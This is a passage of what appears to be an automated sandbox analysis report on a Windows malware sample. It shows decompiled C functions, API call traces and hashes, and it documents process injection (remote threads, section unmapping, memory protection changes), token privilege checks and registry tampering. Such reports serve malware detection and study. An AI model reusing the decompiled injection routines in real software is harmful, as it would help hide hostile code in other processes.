							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
